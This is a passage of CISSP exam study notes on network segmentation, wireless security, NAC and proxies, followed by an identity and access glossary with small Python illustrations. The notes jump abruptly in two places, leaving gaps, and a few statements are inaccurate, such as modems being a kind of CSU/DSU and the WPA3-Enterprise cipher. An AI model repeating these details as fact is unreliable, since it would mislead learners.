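print(jitter(rtts))        # (2 + 1 + 4 + 5) / 4 = 3.0
```

A link can have low average latency but high jitter; for real-time traffic like VoIP the jitter figure is often the more important of the two.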
4.1.8 Traffic flows (e.g. north-south, east-west)
Traffic patterns (in, through, and out of a datacenter) are crucial considerations when designing network
architecture, because they affect the choice of network topologies, routing protocols, and security
strategies
North/South (north-south) traffic: the flow of data in and out of the datacenter, between the
datacenter and a customer; traffic between clients on the Internet and servers within the datacenter
(northbound), or vice versa (southbound); in SDN terms, data flowing up (northbound) and down
(southbound) the stack of data/control/application planes
East/West (east-west) traffic: the flow of data within the datacenter itself, or between interconnected
datacenters; network traffic that is within a data, control, or application plane; within a data center or
between geo dispersed locations; the data flowing laterally between servers, storage systems, and
applications within the datacenter or across datacenters
4.1.9 Physical segmentation (e.g. in-band, out-of-band, air-gapped)
In-band management: managing network devices through the same network that they are used to
transmit user or application data; this is ultimately less secure, because there is no physical segmentation
Out-of-band management: managing network devices using a dedicated network that is separate from
the main network; this is more secure
Air-gapped: extreme form of segmentation where one segment of the network is completely isolated
from all others physically and logically; this is most secure, and is typically used for industrial control
systems (ICS)
Physical segmentation: creating a separate physical network
4.1.10 Logical segmentation (e.g., virtual local area networks (VLANs), virtual private networks (VPNs), virtual
routing and forwarding, virtual domains)
Virtual Local Area Networks (VLAN): allows a single physical network to be partitioned into multiple
smaller logical networks; a virtual LAN is a hardware-imposed network segmentation created by switches
that requires a routing function to support communication between different segments
Virtual Private Network (VPN): creates a private network across public network infrastructure; used to
connect remote users or separate branches of a business to the main office's network; a traditional
remote access technology; VPNs are based on encrypted tunneling; they offer authentication and data
protection as a point-to-point solution
most common VPN protocols: PPTP, L2TP, SSH, TLS, and IPsec
split tunnel: a VPN configuration that allows a VPN-connected client system (e.g. remote node) to
access both the org network via the VPN and the internet directly at the same time
full tunnel: a VPN configuration in which all the client's traffic is sent to the org network over the
VPN link, and any internet-bound traffic is routed out of the org network's proxy or firewall interface
Virtual Routing & Forwarding (VRF): allows multiple instances of a routing table to co-exist within the
same router at the same time, allowing one physical router to emulate multiple virtual routers
Virtual domain: the ability to create multiple separate security domains within a single physical device (e.g. a
firewall); allows multiple virtual firewall instances within a single device, enabling logical
segmentation at the virtual machine level
4.1.11 Micro-segmentation (e.g., network overlays/encapsulation; distributed firewalls, routers, intrusion
detection system (IDS)/intrusion prevention system (IPS), zero trust)
Micro-segmentation: enhances security by minimizing the lateral movement of attackers within a
network, effectively creating a segmented, or compartmentalized architecture where each segment may
have its own security policies and controls
Network overlays/encapsulation: creation of a virtual network that is abstracted or 'overlaid' on top of
the physical network; can be done via SDN
Distributed firewalls: rather than routing traffic through a central firewall, security policies are enforced
at the virtual network interface level for each virtual machine (VM) or container; essentially distributing
virtual firewall rules and building small virtual firewalls, allowing us to achieve micro-segmentation
Distributed routers: similar to distributed firewalls, distributed routers operate at the workload level to
control the flow of traffic between segments
IDS/IPS: deployed strategically within the network to monitor and protect individual workloads or network
segments rather than just at the perimeter
Zero Trust: you can achieve the 'trust nothing, verify everything' nature of ZT by using micro-
segmentation; each micro-segment is treated as its own secure zone, and access to each zone is given
only after the identity and context of the request have been thoroughly verified
4.1.12 Edge networks (e.g., ingress/egress, peering)
Edge networks: a broader term for networks situated at the edge of a centralized network, closer to
end users, to reduce latency; designed to deliver content and services with reduced latency
and increased performance by being located geographically closer to the user; a CDN, where the goal is
to get content as physically close to the user as possible, is an example of an edge network
Ingress: traffic entering a network; typically created by users accessing services hosted at the edge
Egress: traffic exiting a network; usually refers to data sent from services at the edge, back to users, or to
another network
Peering: directly interconnecting separate networks for the purpose of exchanging traffic, instead of
routing traffic through the Internet; many Internet service providers have peering arrangements between
providers
4.1.13 Wireless networks (e.g. Bluetooth, Wi-Fi, Zigbee, satellite)
Narrowband: refers to a communication channel or system that operates with a small bandwidth,
meaning it uses a limited range of frequencies to transmit data; in contrast to broadband, which can carry
large amounts of data over a wide frequency range, narrowband systems focus on efficient transmission
of smaller amounts of data, often over long distances, by using lower data rates and narrower frequency
bands
Light Fidelity (Li-Fi): a form of wireless communication technology that relies on light to transmit data,
with theoretical speeds up to 224 Gbit/s
Radio Frequency Identification (RFID): a technology used to identify and track objects or individuals
using radio waves, with two main components: an RFID tag (or transponder) and an RFID reader; the tag
contains a small microchip and an antenna, and the reader emits a signal that communicates with the tag
to retrieve the stored information
Passive Tags don't have their own power source, relying instead on the energy from the RFID
reader's signal to transmit data
Active Tags have a battery and can broadcast signals over longer distances
Near Field Communication (NFC): a wireless communication technology that allows devices to exchange
data over short distances, usually within a range of about 4 centimeters (1.5 inches); it operates on the
same principle as RFID but is designed for closer proximity communication and is commonly used in
mobile devices for tasks like contactless payments and data sharing; unlike RFID, where only the reader
actively sends signals, NFC enables two-way communication
Active Mode: both devices generate their own radio frequency signals to communicate
Passive Mode: one device (like an NFC tag) is passive and only transmits data when powered by
the active device's signal, similar to how passive RFID tags work
Bluetooth: wireless personal area network, IEEE 802.15; an open standard for short-range RF
communication used primarily with wireless personal area networks (WPANs); secure guidelines:
use Bluetooth only for non-confidential activities
change default PIN
turn off discovery mode
turn off Bluetooth when not in active use
Wi-Fi: Wireless LAN IEEE 802.11x; associated with computer networking, Wi-Fi uses 802.11x spec to
create a public or private wireless LAN
Wired Equivalent Privacy (WEP):
WEP is defined by the original IEEE 802.11 standard
WEP uses a predefined shared Rivest Cipher 4 (RC4) secret key for both authentication
(SKA) and encryption
Shared key is static
WEP is weak from RC4 implementation flaws (short, static IV sent in cleartext, IV is part of
encryption key, and no integrity protection)
Wi-Fi Protected Access (WPA): a security standard for wireless network computing devices;
developed by the Wi-Fi Alliance to provide better data encryption and user authentication than
WEP, which was the original Wi-Fi security standard
Temporal Key Integrity Protocol (TKIP): an encryption protocol that was part of the WPA
protocol; TKIP was designed to replace the insecure WEP encryption protocol; TKIP is no
longer considered secure and has been deprecated
Wi-Fi Protected Access II (WPA2):
IEEE 802.11i WPA2 replaced WEP and WPA
Uses AES-CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code
Protocol)
WPA2 operates in two modes, personal and enterprise
personal mode or the Pre-Shared Key (PSK) relies on a shared passcode or key known
to both the access point and the client device; typically used for home network
security
enterprise mode uses the more advanced Extensible Authentication Protocol (EAP)
and an authentication server and individual credentials for each user or device;
enterprise mode is best suited to companies and businesses
Wi-Fi Protected Access 3 (WPA3):
WPA3-ENT uses 192-bit AES CCMP encryption
WPA3-PER remains at 128-bit AES CCMP
WPA3 simultaneous authentication of equals (SAE): improves on WPA2's PSK mode by
allowing for secure authentication between clients and the wireless network without
enterprise user accounts; SAE performs a zero-knowledge proof process known as
Dragonfly Key Exchange (which is a derivative of Diffie-Hellman); SAE uses a preset
password and the MAC addresses of the client and AP to perform authentication and session
key exchange
802.1X / EAP
IEEE 802.1X defines the use of encapsulated EAP to support a wide range of authentication
options for LAN connections; the 802.1x standard is named "Port-Based Network Access
Control"
802.1X is a mechanism to proxy authentication from the local device to a different dedicated
auth service within the network
WPA, WPA2, and WPA3 support the enterprise (ENT) authentication known as 802.1X/EAP
(requires user accounts)
Extensible Authentication Protocol (EAP) is not a specific mechanism of authentication,
rather an authentication framework
802.1X/EAP is a standard port-based network access control that ensures that clients cannot
communicate with a resource until proper authentication has taken place
Through the use of 802.1X Remote Authentication Dial-In User Service (RADIUS), Terminal
Access Control Access Control System (TACACS), certificates, smartcards, token devices
and biometrics can be integrated into wireless networks
Donʼt forget about ports related to common AAA services:
UDP 1812 for RADIUS
TCP 49 for TACACS+
Service Set Identifier (SSID): the name of a wireless network that is broadcast by a Wi-Fi router
or access point, and used to uniquely identify a wireless network, so devices can recognize and
connect to it; when you search for Wi-Fi networks on your phone or computer, the list of available
networks you see consists of their SSIDs
Extended Service Set Identifier (ESSID): the name of a wireless network (Wi-Fi network)
that users see when they search for available networks, identifying the extended service set,
which is essentially a group of one or more access points (APs) that form a wireless network;
multiple APs in the same network can share the same ESSID, allowing seamless roaming for
users within the network coverage area
Basic Service Set Identifier (BSSID): a unique identifier for each AP in a Wi-Fi network; itʼs
the MAC address of the individual wireless access point or router within the network; while
multiple APs in a network can share the same ESSID, each AP will have its own unique BSSID
to distinguish it from other APs
Site survey: a formal assessment of wireless signal strength, quality, and interference using an RF
signal detector
Wi-Fi Protected Setup (WPS): intended to simplify the effort of setting up/adding new clients to a
secured wireless network; operates by automatically connecting the first new wireless client to
seek the network once WPS is triggered
WPS allows users to easily connect devices to a Wi-Fi network by:
pressing a physical WPS button on the router
entering an 8-digit PIN found on the router
using NFC or Push-Button Connect for quick device pairing
the 8-digit PIN method is vulnerable to attacks, particularly brute-force, due to the
structure of the WPS protocol, since the PIN is validated in two halves; also, many
routers do not implement rate limiting, allowing repeated PIN attempts without lockout
Best WPS protection is to turn it off
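The arithmetic behind the split-half weakness can be shown directly (a sketch; the exact figures assume the standard WPS design, where digit 8 is a checksum of the first seven):

```python
# Why WPS PIN validation in two halves collapses the brute-force space:
naive_space = 10 ** 8   # guessing all 8 digits blindly: 100,000,000 PINs

# WPS confirms the first 4 digits separately, then the second half;
# the 8th digit is a checksum, so only digits 5-7 must be guessed.
first_half = 10 ** 4    # 10,000 possibilities, confirmed on their own
second_half = 10 ** 3   # 1,000 possibilities once the first half is known
split_space = first_half + second_half

print(naive_space)  # 100000000
print(split_space)  # 11000 worst-case guesses -- trivial without rate limiting
```

This is why disabling WPS (or at minimum enforcing lockouts) matters: roughly 11,000 attempts versus 100 million.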
Lightweight Extensible Authentication Protocol (LEAP) is a Cisco proprietary alternative to TKIP for
WPA
Avoid using LEAP, use EAP-TLS as an alternative; if LEAP must be used a complex password
is recommended
Protected Extensible Authentication Protocol (PEAP): a security protocol used to better secure
WiFi networks; PEAP is protected EAP, and it comes with enhanced security protections by
providing encryption for EAP methods, and can also provide authentication; PEAP encapsulates
EAP within an encrypted TLS (Transport Layer Security) tunnel, thus encrypting any EAP traffic that
is being sent across a network
EAP Methods
| Method | Type | Auth | Creds | When to Use |
| --- | --- | --- | --- | --- |
| EAP-MD5 | Non-Tunnel | Challenge/response with hashing | Passwords for client auth | Avoid |
| EAP-MSCHAP | Non-Tunnel | Challenge/response with hashing | Passwords for client auth | Avoid |
| EAP-TLS | Non-Tunnel | Challenge/response with public key cryptography | Digital certificates for client/server auth | To support digital certs as client/server creds |
| EAP-GTC | Non-Tunnel | Cleartext pass | Passwords/OTP for client auth | Only use inside PEAP or EAP-FAST |
services over WAN links; put another way, SD-WAN is an extension of SDN practices to connect entities
spread across the internet, supporting WAN architecture; especially relevant to cloud migration
SD-WANs are commonly used to manage multiple ISPs and other connectivity options for speed,
reliability, and bandwidth design goals
Software-defined Visibility (SDV): a framework to automate the processes of network monitoring and
response; the goal is to enable the analysis of every packet and make deep intelligence-based decisions
on forwarding, dropping, or otherwise responding to threats
4.1.17 Virtual Private Cloud (VPC)
Virtual Private Cloud (VPC): provides a logically isolated and customizable portion of a public cloud
provider's infrastructure to a customer; a private cloud environment that's hosted within a public
cloud; VPCs allow orgs to create a virtual network that is isolated from other users of the public cloud
4.1.18 Monitoring and management (e.g., network observability, traffic flow/shaping, capacity management, fault
detection and handling)
Monitoring and management: tools, practices, and processes aimed at ensuring the availability,
performance, and reliability of computer networks, systems, and services; monitoring and management
includes performance and security monitoring, configuration management, log management, alerting and
notification, reporting and analytics etc.
Network observability: ability to gain insights into the functionality of the network
Traffic flow/shaping: controlling the movement of packets within a network to optimize
performance, prioritize critical traffic, and enforce policies; for instance, prioritizing
protocols/traffic like VoIP
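A classic traffic-shaping mechanism is the token bucket: traffic may burst up to the bucket's capacity, then is held to a steady refill rate. This is a minimal sketch (class and parameter names are illustrative, and the clock is passed in explicitly to keep it deterministic):

```python
class TokenBucket:
    """Minimal token-bucket traffic shaper: a packet is admitted only if a
    token is available; tokens refill at a fixed rate up to a burst capacity."""

    def __init__(self, rate_per_sec: float, capacity: float):
        self.rate = rate_per_sec
        self.capacity = capacity
        self.tokens = capacity      # start full: an initial burst is allowed
        self.last = 0.0

    def allow(self, now: float, cost: float = 1.0) -> bool:
        # refill proportionally to elapsed time, capped at capacity
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= cost:
            self.tokens -= cost
            return True
        return False                # packet is dropped or queued


bucket = TokenBucket(rate_per_sec=2, capacity=3)   # 2 pkts/sec, burst of 3
burst = [bucket.allow(now=0.0) for _ in range(5)]  # 5 packets arrive at once
print(burst)            # [True, True, True, False, False] -- burst capped at 3
later = bucket.allow(now=1.0)                      # 1 s later, 2 tokens refilled
print(later)            # True
```

Real shapers typically queue (delay) excess packets rather than drop them, which is what distinguishes shaping from policing.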
Capacity management: monitoring and planning network resources to ensure they meet current and
future demand; this is becoming less important as more organizations move to the cloud (which provides
resources on-demand)
Fault-detection and handling: appropriately handling issues by identifying and diagnosing problems
using methods like automatic remediation, manual intervention, IR etc
4.2 Secure network components (OSG-10 Chpt 11)
The components of a network make up the backbone of the logical infrastructure for an organization; these
components are often critical to day-to-day operations, and an outage or security issue can be very costly
4.2.1 Operation of hardware (e.g. redundant power, warranty, support)
Modems provide modulation/demodulation of binary data into analog signals for transmission; modems
are a type of Channel Service Unit/Data Service Unit (CSU/DSU) typically used for converting analog
signals into digital; the CSU handles communication to the provider network, the DSU handles
communication with the internal digital equipment (in most cases, a router)
modems typically operate at Layer 2
routers operate at Layer 3, and make the connection from a modem available to multiple devices in
a network, including switches, access points and endpoint devices
switches are typically connected to a router to enable multiple devices to use the connection
switches help provide internal connectivity, as well as create separate broadcast domains when
configured with VLANs
switches typically operate at Layer 2 of the OSI model, but many switches can operate at both
Layer 2 and Layer 3
access points can be configured in the network topology to provide wireless access using one of
the protocols and encryption algorithms
Redundant power: most home equipment use a single power supply, if that supply fails, the device loses
power
redundant power is typically used with components such as servers, routers, and firewalls
redundant power is usually paired with other types of redundancies to provide high availability
4.2.2 Transmission media (e.g., physical security of media, signal propagation quality)
Transmission Media: comes in many forms, not just cables
includes wireless, LiFi, Bluetooth, Zigbee, satellites
most common cause of network failure (i.e. violations of availability) are cable failures or
misconfigurations
wired transmission media can typically be described in three categories: coaxial, Ethernet, fiber
coaxial is typically used with cable modem installations to provide connectivity to an ISP, and
requires a modem to convert the analog signals to digital
ethernet can be used to describe many mediums, it is typically associated with Category 5/6
unshielded twisted-pair (UTP) or shielded twisted pair (STP), and can be plenum-rated
Key Points for Each Cable Type:
STP (Shielded Twisted Pair): features shielding around the pairs of wires to reduce
electromagnetic interference (EMI); commonly used in industrial settings or environments
with high interference
UTP (Unshielded Twisted Pair): the most commonly used cable type for Ethernet (Cat5e,
Cat6, etc.); more susceptible to EMI than STP, but cheaper and easier to install
10Base2 Coax (Thinnet): used to connect systems to backbone trunks of thicknet cabling
(185m, 10Mbps); an older coaxial cable type used for Ethernet networks, now mostly
obsolete; requires terminators at each end of the cable to prevent signal loss
10Base5 Coax (Thicknet): can span 500 meters and provide up to 10Mbps; early Ethernet
cabling standard, thick and heavy, now obsolete; provided long-distance connectivity but
was difficult to install and maintain
100BaseT (Fast Ethernet): supports speeds up to 100 Mbps, used in early LANs, and still
used in some legacy systems
1000BaseT (Gigabit Ethernet): uses UTP or STP cables (usually Cat5e or Cat6) for Gigabit
Ethernet; widely deployed in modern office and home networks
Fiber Optic: uses light for data transmission, making it immune to EMI and capable of very
high speeds and long distances; most often used in the datacenter for backend components;
two main types: Single-mode (for long distances, e.g., up to 40 km) and Multimode (for
shorter distances, e.g., up to 2 km); more expensive than copper-based cables but
necessary for high-speed, long-distance communication
| Cabling Type | Shielding | Max Speed | Max Distance | Cost | Common Use | Installation Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| STP (Shielded Twisted Pair) | Shielded (protects against interference) | 10 Mbps - 10 Gbps | Up to 100 meters for higher speeds | Higher than UTP due to shielding | Industrial and high-interference environments | More complex, due to shielding |
| UTP (Unshielded Twisted Pair) | Unshielded (less interference protection) | 10 Mbps - 10 Gbps | Up to 100 meters for higher speeds | Lower cost, very common | Office LANs, home networks | Easy, lightweight, flexible to install |
| Category | Frequency Range | Max Data Rate | Typical Application | Max Distance | Description |
| --- | --- | --- | --- | --- | --- |
| Cat 5 | 100 MHz | 100 Mbps | Fast Ethernet (100Base-T) | 100 meters | Widely used for Fast Ethernet networks; no longer recommended for new installs |
| Cat 5e | 100 MHz | 1 Gbps | Gigabit Ethernet | 100 meters | Enhanced Cat 5 with reduced crosstalk; standard for most Gigabit Ethernet today |
| Cat 6 | 250 MHz | 1 Gbps (up to 10 Gbps for short distances) | Gigabit Ethernet, 10GBase-T (short distances) | 100 meters for 1 Gbps, 55 meters for 10 Gbps | More robust against interference; supports 10 Gbps at limited distances |
| Cat 6a | 500 MHz | 10 Gbps | 10GBase-T Ethernet | 100 meters | Enhanced Cat 6; supports 10 Gbps at full 100-meter distances |
| Cat 7 | 600 MHz | 10 Gbps | High-speed networking, data centers | 100 meters | Shielded cables; supports higher frequencies with improved noise resistance |
| Cat 8 | 2000 MHz (2 GHz) | 25 Gbps to 40 Gbps | Data centers, high-performance computing | 30 meters | Designed for short-distance data center applications; shielded for minimal noise |
4.2.3 Network Access Control (NAC) systems (e.g., physical, and virtual solutions)
Network Access Control (NAC): the concept of controlling access to an environment through strict
adherence to and enforcement of security policy
NAC is meant to be an automated detection and response system that can react in real time, ensuring all
monitored systems are patched/updated and have current security configurations, as well as keep
unauthorized devices out of the network
NAC goals:
prevent/reduce known attacks directly (and zero-day indirectly)
enforce security policy throughout the network
use identities to perform access control
NAC can be implemented with a preadmission or postadmission philosophy:
preadmission philosophy: requires a system to meet all current security requirements (such as
patch application and malware scanner updates) before it is allowed to communicate with the
network
postadmission philosophy: allows and denies access based on user activity, which is based on a
predefined authorization matrix
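The preadmission model reduces to "every posture check must pass before any network access." A minimal sketch (the check names and posture dictionary are hypothetical, not from any specific NAC product):

```python
# Hypothetical compliance checks a preadmission NAC might enforce
REQUIRED_CHECKS = ("patched", "av_signatures_current", "firewall_enabled")

def preadmission_decision(posture: dict) -> bool:
    """Preadmission: every requirement must pass BEFORE the device is
    allowed to communicate with the network; any failure means quarantine."""
    return all(posture.get(check, False) for check in REQUIRED_CHECKS)

compliant = {"patched": True, "av_signatures_current": True, "firewall_enabled": True}
stale_av  = {"patched": True, "av_signatures_current": False, "firewall_enabled": True}

print(preadmission_decision(compliant))  # True  -> admit to production network
print(preadmission_decision(stale_av))   # False -> quarantine/remediation VLAN
```

A postadmission system would instead evaluate the device's ongoing activity against an authorization matrix after it is already connected.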
Agent-based NAC:
installed on each management system, checks config files regularly, and can quarantine for non-
compliance
dissolvable: usually written in a web/mobile language and is executed on each local machine when
the specific management web page is accessed (such as captive portal)
permanent: installed on the monitored system as a persistent background service
Agentless NAC: no software is installed on the endpoint, instead, the NAC system performs security
checks using existing network infrastructure, such as switches, routers, firewalls, and network protocols;
it gathers information about the device passively or actively through scans, without requiring direct
interaction with the endpoint
NAC posture assessment capability determines if a system is sufficiently secure and compliant to
connect to the network; this is a form of risk-based access control
| Feature | Agent-Based NAC | Agentless NAC |
| --- | --- | --- |
| Software Requirement | Requires agent installation on devices | No software installation required on devices |
| Depth of Security Checks | Provides deep insight into device security posture (antivirus, OS, patches) | Provides basic information (device type, MAC, OS) |
| Continuous Monitoring | Yes, can perform continuous monitoring after network access | Typically performs one-time or periodic checks |
| Device Compatibility | May not support unmanaged devices or IoT devices | Works with all devices (IoT, printers, guest devices) |
| Deployment Complexity | More complex due to agent installation and management | Easier to deploy, no software installation required |
| Granular Control | Offers granular control over security policies | Limited control, focuses on basic compliance |
| Remediation Capabilities | Can help remediate non-compliant devices (e.g., installing patches) | Limited or no remediation capabilities |
Just as you need to control physical access to equipment and wiring, you need to use logical controls to
protect a network; there are a variety of devices that provide this type of protection, including:
stateful and stateless firewalls can perform inspection of the network packets and use rules,
signatures and patterns to determine whether the packet should be delivered
reasons for dropping a packet could include addresses that donʼt exist on the network, ports
or addresses that are blocked, or the content of the packet (e.g. malicious packets blocked
by admin policy)
intrusion detection and prevention (IDP) devices, which monitor the network for unusual
traffic and MAC or IP address spoofing, and then either alert on or actively stop this type of traffic
proxy server information:
proxy server: used to mediate between clients and servers, most often in the context of
providing clients on a private network with internet access, while protecting the identity of
the client
forward proxy: usually used by clients to anonymize their traffic, improve privacy, and cache
data; a forward proxy is configured on client-side devices to manage access to external
resources
reverse proxy: usually positioned in front of servers to distribute incoming traffic, improve
performance through load balancing, and enhance security by hiding the details of backend
servers; reverse proxies are often deployed to a perimeter network; they proxy
communication from the internet to an internal host, such as a web server
transparent proxy: operates without client configuration and intercepts traffic transparently,
often for monitoring or content filtering purposes without altering the clientʼs perception of
the connection
nontransparent proxy: requires explicit configuration on the client side and may modify
traffic to enforce policies, such as restricting access or logging user activities
| Attribute | Forward Proxy | Reverse Proxy | Transparent Proxy | Nontransparent Proxy |
| --- | --- | --- | --- | --- |
| Primary Function | Acts as an intermediary between client and internet | Acts as an intermediary between client and backend servers | Intercepts client requests without modifying them | Requires explicit client configuration |
| Client Awareness | Client is aware of proxy usage | Client is unaware of proxy usage | Client is unaware of proxy usage | Client is aware of proxy usage |
| Use Case | Content filtering, privacy, and caching for users | Load balancing, security, and hiding server identity | Caching, content filtering without client configuration | Content filtering, security, and logging |
| Configuration | Configured on client devices or network settings | Configured on the server side | No configuration needed on the client side | Requires configuration on the client side |
| Proxy Visibility | Proxy IP address is visible to the target website | Proxy hides server IP address from the client | Proxy operation is invisible to both client and server | Proxy server IP address is visible to the client |
| Modification of Requests | Can modify or filter client requests | Can modify server responses or requests from clients | Does not modify requests or responses | Can modify or filter client requests |
AAL3 (very high confidence): requires hardware-based MFA and mandates verifier impersonation
(phishing) resistance
Accountability: after authenticating subjects, systems authorize access to objects based on their proven
identity; auditing logs and audit trails record events, including the identity of the subject performing the action;
the combination of effective identification, authentication, and auditing provides accountability; note that
accountability is a key principle of access control
The three primary authentication factors are authentication by knowledge (something you know), authentication
by ownership (something you have), and authentication by characteristic (something you are)
Something you know: Type 1 authentication (passwords, pass phrase, PIN etc)
Something you have: Type 2 authentication (ID, passport, smart card, token, cookie on PC etc)
Something you are: Type 3 authentication, includes biometrics (fingerprint, iris or retinal scan, facial
geometry etc.)
Somewhere you are: Type 4 authentication (IP/MAC address)
Something you do: Type 5 authentication (signature, pattern unlock)
Single sign-on (SSO) technologies allow users to authenticate once and access any resources in a network or
the cloud, without authenticating again
Access Control System: ensuring access to assets is authorized and restricted based on business and security
requirements
Access Control Token: based on the parameters like time, date, day etc a token defines access validity to a
system
ADFS: identity access solution that provides client computers (internal or external to your network) with
seamless SSO access to protected Internet-facing applications or services, even when the user accounts and
applications are located in completely different networks or orgs
Asynchronous token (authentication by ownership hard/soft token): involves a challenge and response; they
are more complicated (and expensive), but also more secure (see synchronous token)
Cache poisoning: adding content to cache that wasn't an intended element (of, say, a web page); once
poisoned, a legit web doc can call on a cached item, activating the malicious cached content
Capability tables: list privileges assigned to subjects and identify the objects that subjects can access
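A capability table is subject-centric (each row is a subject and the objects/rights it holds), in contrast to an object-centric ACL. A minimal sketch with hypothetical subjects and objects:

```python
# Capability table: indexed by SUBJECT -> objects -> rights held
# (an ACL would instead be indexed by object -> subjects allowed)
capability_table = {
    "alice": {"payroll.db": {"read"}, "report.docx": {"read", "write"}},
    "bob":   {"report.docx": {"read"}},
}

def can(subject: str, obj: str, right: str) -> bool:
    """Answer 'what can this subject do?' with a direct subject-side lookup."""
    return right in capability_table.get(subject, {}).get(obj, set())

print(can("alice", "payroll.db", "read"))  # True
print(can("bob", "payroll.db", "read"))    # False -- no capability held
```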
CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart is a security measure
used to protect against account creation automation and spam & brute-force password decryption attacks
CAS: Central Authentication Service (an SSO implementation)
Content-dependent control: Content-dependent access control adds additional criteria beyond identification
and authentication: the actual content the subject is attempting to access; all employees of an org may have
access to the HR database to view their accrued sick time and vacation time, but should an employee attempt
to access the content of the CIO's HR record, access is denied
Context-dependent access control: applies additional context before granting access, with time as a
commonly used context
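The distinction between the two can be sketched in a few lines (the HR-record and business-hours rules mirror the examples above; names are illustrative):

```python
def content_dependent_allow(subject: str, record_owner: str) -> bool:
    """Content-dependent: the decision looks at WHAT is being accessed --
    employees may read only their OWN HR record."""
    return subject == record_owner

def context_dependent_allow(hour: int, start: int = 9, end: int = 17) -> bool:
    """Context-dependent: the decision looks at the CIRCUMSTANCES of access --
    here, time of day (a commonly used context)."""
    return start <= hour < end

print(content_dependent_allow("alice", "alice"))  # True:  her own record
print(content_dependent_allow("alice", "cio"))    # False: the CIO's record
print(context_dependent_allow(hour=22))           # False: outside business hours
```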
Crossover Error Rate (CER): identifies the accuracy of a biometric method, and is the point at which false
acceptance rate (FAR or Type 2) equals the false rejection rate (FRR or Type 1) for a given sensor, in a given
system and context; it is the optimal point of operation if the potential impacts of both types of errors are
equivalent
Cross-Site Request Forgery (CSRF): (AKA XSRF) an attack that forces authenticated users to submit a
request to a Web application against which they are currently authenticated; in CSRF attack the intended target
is the web app itself; the attack exploits the trust that the web app has in the user's browser, and by tricking the
auth'd user into submitting a forged request, the attacker can cause the web app to perform actions as if it were
initiated by the legit user
FRR: False Rejection Rate (Type 1) is the probability of incorrectly denying authentication to a legit identity and
therefore denying access; expressed as a percentage
FAR: False Acceptance Rate (Type 2) is the probability of incorrectly authenticating a claimed identity as legit,
recognizing and granting access on that basis; expressed as a percentage
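The relationship between FAR, FRR, and CER can be made concrete: as sensor sensitivity increases, FAR (Type 2) falls while FRR (Type 1) rises, and the CER is the operating point where they meet. The error rates below are hypothetical illustration values, not measurements from any real sensor:

```python
# Hypothetical FAR/FRR measured at increasing sensitivity settings:
sensitivities = [1, 2, 3, 4, 5]
far = [0.20, 0.12, 0.06, 0.03, 0.01]   # Type 2 errors fall as sensitivity rises
frr = [0.01, 0.03, 0.06, 0.10, 0.15]   # Type 1 errors climb as sensitivity rises

# CER: the setting where FAR and FRR cross (are closest/equal)
cer_setting = min(sensitivities, key=lambda s: abs(far[s - 1] - frr[s - 1]))
cer = far[cer_setting - 1]

print(cer_setting, cer)  # setting 3, CER = 0.06 (6%) -- lower CER = more accurate
```

A lower CER indicates a more accurate biometric system, which is why CER (not FAR or FRR alone) is used to compare devices.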
Ethical Wall: the use of administrative, physical/logical controls to establish/enforce separation of information,
assets or job functions for need-to-know boundaries or prevent conflict of interest situations; AKA
compartmentalization
Granularity of controls: level of abstraction or detail which in a security function can be configured or tuned for
performance and sensitivity
IDaaS: cloud-based service that brokers IAM functions to target systems on customers' premises and/or in the
cloud; refers to implementation/integration of identity services in a cloud-based environment; services include
provisioning, administration, SSO, MFA, and directory services, on-prem and in the cloud
Identification: the process of a subject claiming, or professing, an identity; subjects claim an identity through
identification
Identity proofing: AKA registration, process of confirming someone is who they claim to be; process of
collecting/verifying info about someone who has requested access/credential/special privilege to establish a
relationship with that person; identity proofing includes knowledge-based authentication and cognitive
passwords, where a user is asked a series of questions that only they would know
Knowledge-based authentication (KBA): process of asking a user a series of questions based on their history
that is recorded in authoritative sources; e.g. a bank asks a customer a series of questions about past
addresses they've lived, and current payment amounts for car/mortgage
Memory card: authentication by ownership factor typically uses a magnetic strip as memory, where the same
data is read from the strip with every transaction
Objects: things a subject accesses, such as files; a user is a subject who accesses objects while performing
some action or accomplishing a task
Passwords authentication: the weakest form of authentication, but password policies help increase security by
enforcing complexity and history requirements
Policy Enforcement Point (PEP): app component that receives auth requests, functioning as a gatekeeper,
sending the request on to the PDP; once a decision is provided by the PDP, the PEP enforces it (grant/deny)
Policy Decision Point (PDP): make decisions on auth requests sent from PEP, based on pre-defined rules
Self-service identity management: elements of the identity management lifecycle which the end-user
(identity in question) can initiate or perform on their own (e.g. password reset, changes to challenge questions
etc)
Server-Side Request Forgery (SSRF): if an API fetches a remote resource without validating the user-supplied
URI, this vuln lets the attacker exploit the application to send a crafted request to an unexpected destination
(regardless of firewall/VPN protection)
SESAME: Secure European System for Applications in a Multi-Vendor Environment, an improved version of
Kerberos; a protocol for SSO (like Kerberos), but with the advantage of supporting both symmetric and
asymmetric cryptography (and therefore solving Kerberos' key distribution problem); it also issues multiple
tickets, mitigating attacks like TOCTOU
Session: what is created as a result of a successful user identification, authentication, and authorization
process; represents the connection and interaction between a user and a system
Seven Laws of Identity:
1: User control and consent: identity systems should only reveal user-identifying info with the user's
consent
2: Minimal disclosure for a constrained use: the identity system should disclose the least identifying info
possible
3: Justifiable parties: systems should only disclose information to parties that have a justified need
4: Directed identity: highlights the need for both public and private identifiers, giving individuals control of
their identities and how they establish trust
5: Pluralism of operators and technologies: identity systems should interoperate with agreed-upon
protocols and a unified user experience
6: Human integration: businesses should establish very reliable communication between a system and
users and test safeguards regularly
7: Consistent experience across context: the unifying identity system should guarantee users a simple,
consistent experience, allowing users to decide what identity to use in what context
Smart card: authentication by ownership factor that contains an embedded integrated circuit (IC) chip that
generates unique auth data with every transaction (see memory card)
Split-response attack: attack that causes the client to download content that was not an intended element of a
requested web page, storing it in browser cache
Subject: entities, such as users, that access passive objects
Synchronous token (authentication by ownership hard/soft token): both the token generator and auth server
generate the same token or one-time password every 30-60 seconds (see asynchronous token)
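TOTP (RFC 6238) is the common synchronous-token scheme: both sides derive the same code from a shared secret and the current 30-second time window. A compact standard-library sketch (using the RFC's published ASCII test secret):

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238-style time-based one-time password (HMAC-SHA1)."""
    counter = unix_time // step                        # current 30-second window
    msg = struct.pack(">Q", counter)                   # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                         # dynamic truncation (RFC 4226)
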